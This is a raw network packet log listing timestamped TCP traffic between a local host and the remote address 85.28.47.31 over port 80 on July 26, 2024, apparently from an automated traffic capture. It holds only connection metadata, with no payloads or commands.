Jul 26, 2024 20:09:13.669522047 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.669534922 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.669545889 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.669567108 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.669601917 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.669888973 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.669910908 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.669925928 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.669939995 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.669940948 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.669956923 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.669964075 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.669972897 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.669987917 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.670003891 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.670005083 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.670027971 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.670051098 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.670291901 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.670308113 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.670321941 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.670337915 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.670345068 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.670352936 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.670367956 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.670382977 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.670389891 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.670397043 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.670414925 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.670435905 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.670465946 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.670481920 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.670492887 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.670507908 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.670517921 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.670522928 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.670537949 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.670543909 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.670552969 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.670567989 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.670581102 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.670583010 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.670598030 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.670614004 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.670622110 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.670628071 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.670644045 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.670649052 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.670659065 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.670670033 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.670701027 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.671257973 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.671273947 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.671288967 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.671303034 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.671317101 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.671319008 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.671333075 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.671350002 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.671355009 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.671370029 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.671385050 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.671385050 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.671400070 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.671407938 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.671415091 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.671430111 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.671432972 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.671443939 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.671461105 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.671469927 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.671477079 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.671489954 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.671508074 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.671509981 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.671521902 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.671536922 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.671539068 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.671554089 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.671561956 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.671567917 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.671583891 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.671590090 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.671627998 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.672447920 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.672463894 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.672478914 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.672498941 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.672509909 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.672516108 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.672530890 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.672545910 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.672555923 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.672561884 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.672574997 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.672578096 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.672591925 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.672605038 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.672631979 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.763708115 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.763726950 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.763741970 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.763808012 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.763849974 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.763855934 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.763864994 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.763880014 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.763896942 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.763904095 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.763930082 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.763971090 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.764004946 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.764027119 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.764043093 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.764050961 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.764059067 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.764074087 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.764079094 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.764090061 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.764096975 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.764137983 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.764513969 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.764528990 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.764543056 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.764558077 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.764570951 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.764571905 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.764585972 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.764588118 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.764601946 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.764616013 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.764625072 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.764631033 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.764643908 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.764659882 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.764662981 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.764693022 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.764734983 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.764888048 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.764903069 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.764928102 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.764935970 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.764950037 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.764957905 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.764966011 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.764981031 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.764981031 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.764997005 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.765003920 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.765012026 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.765026093 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.765039921 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.765044928 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.765054941 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.765069008 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.765073061 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.765084028 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.765091896 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.765100002 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.765114069 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.765129089 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.765130997 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.765144110 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.765158892 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.765172958 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.765173912 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.765187025 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.765193939 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.765209913 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.765225887 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.765244961 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.765263081 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.765918970 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.765934944 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.765949011 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.765964031 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.765965939 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.765979052 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.765994072 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.766006947 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.766010046 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.766024113 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.766036987 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.766040087 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.766051054 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.766066074 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.766068935 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.766079903 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.766097069 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.766110897 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.766113043 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.766127110 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.766140938 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.766141891 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.766158104 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.766171932 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.766191006 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.766222954 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.957783937 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.962883949 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.147563934 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.147674084 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.148714066 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.148729086 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.148782969 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.148813009 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.167726040 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.167742968 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.167759895 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.167773962 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.167789936 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.167829990 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.167897940 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.173592091 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.173608065 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.173665047 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.175569057 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.175585985 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.175657034 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.182156086 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.182173014 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.182188034 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.182260990 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.182295084 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.184396982 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.184412956 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.184468031 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.184492111 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.188047886 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.188064098 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.188112020 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.188127995 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.192095041 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.192111969 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.192193031 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.195482969 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.195498943 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.195514917 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.195569992 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.195597887 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.199477911 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.199493885 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.199536085 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.199568033 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.203465939 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.203488111 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.203530073 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.203558922 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.206929922 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.206945896 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.206999063 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.210213900 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.210230112 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.210283041 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.213356972 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.213372946 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.213385105 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.213419914 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.213457108 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.228796005 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.228940010 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.229582071 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.229603052 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.229652882 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.229684114 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.232232094 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.232316017 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.233350992 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.233417034 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.233496904 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.233551025 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.236685038 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.236701965 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.236753941 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.236783981 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.239835024 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.239944935 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.240019083 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.240072966 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.243314981 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.243335009 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.243380070 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.243413925 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.245913982 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.245930910 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.245945930 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.245982885 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.246032000 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.248558044 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.248574018 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.248588085 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.248640060 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.248667002 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.251200914 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.251215935 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.251262903 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.251288891 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.254363060 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.254426956 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.254498959 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.254548073 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.256266117 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.256282091 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.256325006 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.256351948 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.258727074 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.258743048 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.258959055 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.261162043 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.261178017 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.261238098 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.261287928 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.261332035 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.263664007 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.263679981 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.263695002 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.263736010 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.263768911 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.265888929 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.265904903 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.265959024 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.267983913 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.267998934 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.268044949 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.270078897 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.270093918 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.270107985 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.270138979 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.270179033 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.272151947 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.272167921 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:14.272212982 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:14.274348974 CEST	80	49704	85.28.47.31	192.168.2.5
